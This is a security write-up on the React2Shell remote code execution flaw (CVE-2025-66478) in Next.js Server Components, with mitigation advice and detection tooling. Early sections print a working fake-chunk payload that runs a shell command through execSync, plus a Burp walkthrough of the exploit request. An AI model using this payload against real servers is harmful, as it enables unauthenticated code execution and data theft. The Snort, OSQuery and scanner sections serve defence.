Breaking Down the Next.js RCE: Critical Vulnerability CVE-2025-66478 (React2Shell)
Introduction
React Server Components (RSC) let components be rendered on the server instead of the browser. This improves performance because heavy computations happen on the server, sending only the rendered output to the client.
Communication between server and client uses the React Flight protocol, which serializes and deserializes data. When a client triggers a Server Action, it sends serialized data, which the server processes.
In December 2025, a critical vulnerability, CVE-2025-66478, was disclosed in React Server Components (RSC), particularly affecting Next.js. Dubbed “React2Shell”, it allows unauthenticated remote code execution (RCE) through a single, specially crafted HTTP request. Its maximum CVSS score of 10.0 shows how severe it is.
When exploited, an attacker can make the server run any command, such as:
- Reading files
- Stealing environment variables
- Triggering DNS callbacks
- Running system commands
This article breaks down how the exploit works, and how attackers craft payloads to abuse it.
The vulnerability lies in how this serialization format is deserialized. A serialized value can contain references such as:
- `$@` followed by an id: a chunk reference
- `$B` followed by an id: a Blob reference
- `$1:constructor:constructor`: a property path, walked segment by segment starting from chunk 1
If the property path is walked with plain property access and no restriction to safe, own properties, an attacker can reach JavaScript’s Function constructor (every object’s `constructor.constructor`), which compiles a string into runnable code.
Exploitation Chain
- Fake Chunk Object
The attacker sends a fake React chunk via a multipart form. It looks like:

```json
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "process.mainModule.require('child_process').execSync('xcalc');",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
```

React treats this object as a normal chunk. Pointing `then` at the chunk prototype’s own `then` method makes the plain object look like a real, already-resolved chunk, so the deserializer continues with the attacker-controlled fields instead of its own internal state. When the `$B1337` blob reference inside `value` is resolved, the deserializer calls `_response._formData.get(_response._prefix + "1337")`; with `get` pointing at the Function constructor (reached through `$1:constructor:constructor`) and `_prefix` holding attacker JavaScript, that call compiles and runs the attacker’s code (here `execSync('xcalc')`).
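To make the property-path problem concrete, here is an added illustration written for this article; it is not React’s deserializer and does not reproduce the Flight format, only the idea of walking a `$<id>:<prop>:<prop>` reference. The `chunks` map, its ids and contents, and the function names are constructed for the example.

```javascript
// Added illustration, not React's code: a toy resolver for
// "$<id>:<prop>:<prop>" references shows why walking arbitrary property
// names reaches the Function constructor, and what a hardened resolver
// must refuse. Chunk ids and contents are constructed sample data.
const chunks = new Map([
  [1, {}],                 // any plain object is enough for the attack
  [2, { name: "demo" }],   // a normal resolved value
]);

// Naive resolver: plain property access on every segment. It follows
// inherited properties, so "$1:constructor:constructor" yields
// {}.constructor.constructor, i.e. Function.
function resolveNaive(ref) {
  if (!ref.startsWith("$")) return ref;
  const [id, ...path] = ref.slice(1).split(":");
  let value = chunks.get(Number(id));
  for (const key of path) {
    if (value == null) return undefined;
    value = value[key];
  }
  return value;
}

// Hardened resolver: only own properties of plain objects, plus an explicit
// deny-list for the segments that lead to prototypes or constructors.
const DENY = new Set(["__proto__", "constructor", "prototype"]);

function resolveHardened(ref) {
  if (!ref.startsWith("$")) return ref;
  const [id, ...path] = ref.slice(1).split(":");
  let value = chunks.get(Number(id));
  for (const key of path) {
    if (DENY.has(key)) throw new Error(`refused unsafe path segment: ${key}`);
    if (value === null || typeof value !== "object" || !Object.hasOwn(value, key)) {
      throw new Error(`no own property "${key}" on referenced value`);
    }
    value = value[key];
  }
  return value;
}

// Harmless demonstration that the naive path really is code execution:
// the resolved Function constructor compiles and runs a string.
function naiveReachesFunction() {
  const ctor = resolveNaive("$1:constructor:constructor");
  return ctor === Function && ctor("return 6 * 7")() === 42;
}
```

`naiveReachesFunction()` returns true, which is the whole problem: a reference string chosen by the client ends in a call to `Function`. The hardened resolver refuses the `__proto__`, `constructor` and `prototype` segments and only follows own properties of plain objects. Upgrading to the patched versions listed under Mitigation is the actual fix; the resolver only illustrates the invariant a deserializer has to enforce.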
Example of Exploit
Scan the target to confirm that it is vulnerable to the Next.js RCE. A Next.js RSC RCE scanner can be used for this; follow the link to download and install the scanner.

Open Burp Suite, go to the Repeater tab, click the “+” button under Repeater and choose New HTTP tab.

Copy and paste the following request into the new Repeater tab:
```http
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    <<REDACTED CODE>> // can't provide code for exploit educational purpose
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```

Set the target by clicking “Target: not specified” in the top right corner of the Repeater tab, enter the host and port, and send the request. Because the `_prefix` value is redacted above, the Content-Length of 740 no longer matches the body; leave Burp’s “Update Content-Length” option enabled so the header is recalculated when you edit the request.

Results.

Figure: /etc/passwd file exposed using the RCE.
Mitigation and How to Stay Protected
CVE-2025-66478 is extremely dangerous because it allows unauthenticated remote code execution through one HTTP request. The good news is that the fix is simple and already available.
Below are the recommended mitigation steps.
1. Update React & Next.js Immediately
The vulnerability affects the React Server Components packages (react-server-dom-webpack, react-server-dom-turbopack and react-server-dom-parcel) and the Next.js releases that bundle them.
Vulnerable versions: React 19.0.0, 19.1.0, 19.1.1 and 19.2.0 (the OSQuery rule below lists the exact packages).
Safe (patched) versions:

| Component | Patched version |
| --- | --- |
| React | 19.0.1, 19.1.2, 19.2.1 |
| Next.js | all versions that ship these React patches |

Fixed (patched) React versions are 19.0.1, 19.1.2 and 19.2.1; update immediately if you use RSC.
- For Next.js applications using RSC with the App Router (i.e. affected by CVE-2025-66478), upgrade to one of the patched Next.js releases: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 or 16.0.7.
- If you are on a Next.js canary (e.g. 14.3.0-canary.77 or a later canary), downgrade to the latest stable 14.x version.
2. Add a WAF Rule While You Patch
As an interim layer while patching, you may deploy a WAF or similar request filter to block suspicious payloads, for instance by filtering out unusual multipart/form-data requests or the unexpected headers associated with the exploit pattern. Several cloud providers and security vendors have already released WAF rules tailored for React2Shell. Treat this as a stopgap only: it reduces exposure but does not remove the vulnerable code.
Detection & Monitoring
One advantage in detecting CVE-2025-66478 (“React2Shell”) is that exploitation requires a very specific request structure. Instead of trying to inspect the attacker’s payload, which can vary, we can detect the shape of the request, which is always similar.
Below are two practical detection methods: Snort for network‑level monitoring and OSQuery for endpoint‑level package inspection.
Snort 3 Detection Rule
Snort can flag incoming HTTP requests that match the exploitation pattern.
The rule below uses Snort 3 syntax (sticky buffers placed before the content or pcre they apply to, content modifiers separated by commas); `$HOME_NET` must be defined in your snort.lua.

```
# Snort 3 rule; $HOME_NET is the standard variable for the protected network
alert http any any -> $HOME_NET any (
    msg:"Potential Next.js React2Shell / CVE-2025-66478 attempt";
    flow:to_server,established;
    http_header; content:"Next-Action", nocase;
    http_header; content:"multipart/form-data", nocase;
    http_client_body; pcre:"/Content-Disposition:\s*form-data;\s*name=\"0\"/s";
    http_client_body; pcre:"/\"status\"\s*:\s*\"resolved_model\"/s";
    http_client_body; pcre:"/\"then\"\s*:\s*\"\$1:__proto__:then\"/s";
    classtype:web-application-attack;
    sid:6655001;
    rev:1;
)
```

What this rule looks for
This rule detects:
- Requests containing the `Next-Action` header. The Next.js client runtime sets this header when it invokes a Server Action, so it appears in legitimate traffic of applications that use Server Actions, but it never appears in ordinary page or asset requests.
- Requests with a `multipart/form-data` body. Normal RSC navigation requests do not use this format (Server Action form submissions do); the exploit must use it to pass the crafted chunk object.
- Presence of the `name="0"` form field. Every public exploit requires a `"0"` field because that is where the malicious fake chunk object is placed; legitimate Server Action form posts can also carry a field named `0`, which is why the next indicator matters.
- Key patterns from the exploit JSON, such as `"status": "resolved_model"` and `"then": "$1:__proto__:then"`. These values do not appear in normal application traffic and are the real discriminator; the header and content-type checks only narrow the search.
So even without knowing the full payload, Snort can reliably detect attack attempts.
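The same matching logic as the Snort rule, expressed as a small JavaScript function that can be run over raw HTTP requests exported from a proxy or packet capture. This is an added example, not the post’s own tooling: the three sample requests (an attack-shaped request with the `_prefix` value replaced by `<redacted>`, a normal-looking Server Action form submission, and a plain GET) are constructed for it, and the host names, boundary string and action id are placeholders.

```javascript
// Added example, not from the original post: the Snort rule's logic as a
// function over raw HTTP requests. Sample requests are constructed; host
// names, boundary strings and action ids are placeholders.

// Split a raw request into request line, lower-cased header map and body.
function parseRequest(raw) {
  const [head, ...bodyParts] = raw.split(/\r?\n\r?\n/);
  const [requestLine, ...headerLines] = head.split(/\r?\n/);
  const headers = {};
  for (const line of headerLines) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { requestLine, headers, body: bodyParts.join("\n\n") };
}

// Body indicators, mirroring the rule's pcre options.
const BODY_INDICATORS = {
  field0: /Content-Disposition:\s*form-data;\s*name="0"/i,
  resolvedModel: /"status"\s*:\s*"resolved_model"/,
  protoThen: /"then"\s*:\s*"\$1:__proto__:then"/,
};

// Evaluate every indicator; alert only when all of them match, exactly as
// the Snort rule does (its content/pcre options are ANDed).
function classify(raw) {
  const { requestLine, headers, body } = parseRequest(raw);
  const hits = {
    nextAction: "next-action" in headers,
    multipart: /multipart\/form-data/i.test(headers["content-type"] || ""),
  };
  for (const [name, re] of Object.entries(BODY_INDICATORS)) hits[name] = re.test(body);
  return { requestLine, alert: Object.values(hits).every(Boolean), hits };
}

// Names of the requests in a {name: raw} map that trigger the alert.
function scan(requests) {
  return Object.entries(requests)
    .filter(([, raw]) => classify(raw).alert)
    .map(([name]) => name);
}

const B = "----b"; // constructed multipart boundary
const SAMPLES = {
  // Exploit-shaped request; the _prefix payload is replaced by <redacted>.
  attack: [
    "POST / HTTP/1.1",
    "Host: app.example",
    "Next-Action: x",
    `Content-Type: multipart/form-data; boundary=${B}`,
    "",
    `--${B}`,
    'Content-Disposition: form-data; name="0"',
    "",
    '{"then":"$1:__proto__:then","status":"resolved_model","value":"{\\"then\\":\\"$B1337\\"}",' +
      '"_response":{"_prefix":"<redacted>","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}',
    `--${B}`,
    'Content-Disposition: form-data; name="1"',
    "",
    '"$@0"',
    `--${B}--`,
  ].join("\r\n"),
  // A normal Server Action form submission also carries Next-Action,
  // multipart/form-data and a field named "0"; only the JSON patterns differ.
  benignAction: [
    "POST /signup HTTP/1.1",
    "Host: app.example",
    "Next-Action: 40a1b2c3d4e5f6",
    `Content-Type: multipart/form-data; boundary=${B}`,
    "",
    `--${B}`,
    'Content-Disposition: form-data; name="1_email"',
    "",
    "user@example.com",
    `--${B}`,
    'Content-Disposition: form-data; name="0"',
    "",
    '["$K1"]',
    `--${B}--`,
  ].join("\r\n"),
  plainGet: "GET /about HTTP/1.1\r\nHost: app.example\r\n\r\n",
};

console.log(scan(SAMPLES)); // only "attack" is listed for the constructed samples
```

`classify()` returns the per-indicator hits as well as the verdict, which is useful for triage: the benign Server Action request lights up `nextAction`, `multipart` and `field0` but not the two JSON patterns, which is exactly why the rule must AND all five conditions rather than alert on the header alone.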
OSQuery Detection Rule
OSQuery lets you inspect what NPM packages (and versions) are installed on a system.
This helps detect the vulnerability before deployment or during CI/CD.
```json
{
  "queries": {
    "detect_react2shell_react_server_components": {
      "query": "SELECT name, version, path FROM npm_packages WHERE (name='react-server-dom-parcel' AND (version='19.0.0' OR (version >= '19.1.0' AND version < '19.1.2') OR version='19.2.0')) OR (name='react-server-dom-turbopack' AND (version='19.0.0' OR (version >= '19.1.0' AND version < '19.1.2') OR version='19.2.0')) OR (name='react-server-dom-webpack' AND (version='19.0.0' OR (version >= '19.1.0' AND version < '19.1.2') OR version='19.2.0'));",
      "interval": 3600,
      "description": "Detects vulnerable versions of React Server Components packages (react-server-dom-*) affected by CVE-2025-55182 / CVE-2025-66478 / React2Shell.",
      "platform": "linux,windows,macos",
      "version": "1.0"
    }
  }
}
```

What this rule does
This OSQuery configuration:
- Scans for the three vulnerable packages: react-server-dom-parcel, react-server-dom-turbopack and react-server-dom-webpack
- Flags installations of the vulnerable versions: 19.0.0, 19.1.0, 19.1.1 and 19.2.0
Two caveats: the `version` comparison is a plain string comparison, exact for the versions listed but not semver-aware (a hypothetical 19.1.10 would also fall inside `>= '19.1.0' AND < '19.1.2'`); and by default the `npm_packages` table enumerates globally installed packages, so to inspect an application’s own `node_modules` add a `directory = '<project path>'` constraint to the WHERE clause.
Why this is valuable
- It identifies vulnerable apps in CI/CD pipelines
- It can detect vulnerable packages on developer machines
- It helps security teams find exposure before an attacker does
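For a CI gate that does not need osquery on the build host, the same version check can be run against the project’s package-lock.json. This is an added example, not part of the original post or of osquery: it encodes the vulnerable and patched versions listed above, compares versions numerically rather than as strings, treats a prerelease of a patched version (for instance a canary tag) as still vulnerable, walks nested copies under `node_modules/<dep>/node_modules/`, and uses a constructed lockfile as sample input.

```javascript
// Added example, not from the original post: the OSQuery rule's version
// logic applied to an npm package-lock.json ("packages" map, lockfileVersion
// 2 or 3) so a CI job can fail before anything is installed on a host.
// The lockfile below is constructed sample input.

const AFFECTED_PACKAGES = new Set([
  "react-server-dom-parcel",
  "react-server-dom-turbopack",
  "react-server-dom-webpack",
]);

// First patched release of each affected 19.x line, as listed in the advisory.
const PATCHED_BY_LINE = { "19.0": "19.0.1", "19.1": "19.1.2", "19.2": "19.2.1" };

// "19.2.1-canary.3" -> { nums: [19, 2, 1], prerelease: true }
function parseVersion(version) {
  const [core, tag] = version.split(/[-+]/);
  return { nums: core.split(".").map(Number), prerelease: tag !== undefined };
}

// Numeric major.minor.patch comparison (avoids the string-comparison pitfall).
function compareCore(a, b) {
  for (let i = 0; i < 3; i++) {
    const d = (a[i] || 0) - (b[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

function isVulnerableVersion(version) {
  const { nums, prerelease } = parseVersion(version);
  const fixed = PATCHED_BY_LINE[`${nums[0]}.${nums[1]}`];
  if (!fixed) return false; // lines the advisory does not list are not flagged
  const d = compareCore(nums, parseVersion(fixed).nums);
  // Below the patched release, or a prerelease of it: 19.2.1-canary.x sorts
  // before 19.2.1 under semver, so treat it as unpatched.
  return d < 0 || (d === 0 && prerelease);
}

// Walk every installed package, including nested copies such as
// node_modules/some-lib/node_modules/react-server-dom-webpack.
function findVulnerable(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === "" || !meta.version) continue; // "" is the root project entry
    const name = path.slice(path.lastIndexOf("node_modules/") + "node_modules/".length);
    if (AFFECTED_PACKAGES.has(name) && isVulnerableVersion(meta.version)) {
      findings.push({ path, name, version: meta.version });
    }
  }
  return findings;
}

// Constructed lockfile: one patched copy, one vulnerable top-level copy and
// one vulnerable nested copy that a shallow dependency listing would miss.
const SAMPLE_LOCK = {
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app" },
    "node_modules/some-lib": { version: "1.4.0" },
    "node_modules/react-server-dom-turbopack": { version: "19.2.1" },
    "node_modules/react-server-dom-webpack": { version: "19.2.0" },
    "node_modules/some-lib/node_modules/react-server-dom-webpack": { version: "19.1.1" },
  },
};

console.log(findVulnerable(SAMPLE_LOCK)); // two findings for the constructed lockfile
```

In a real pipeline, read the lockfile with `JSON.parse(fs.readFileSync("package-lock.json"))` and fail the job when `findVulnerable()` returns anything; the nested finding in the sample is the case that matters, because a transitive copy of react-server-dom-webpack is just as exploitable as the top-level one.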
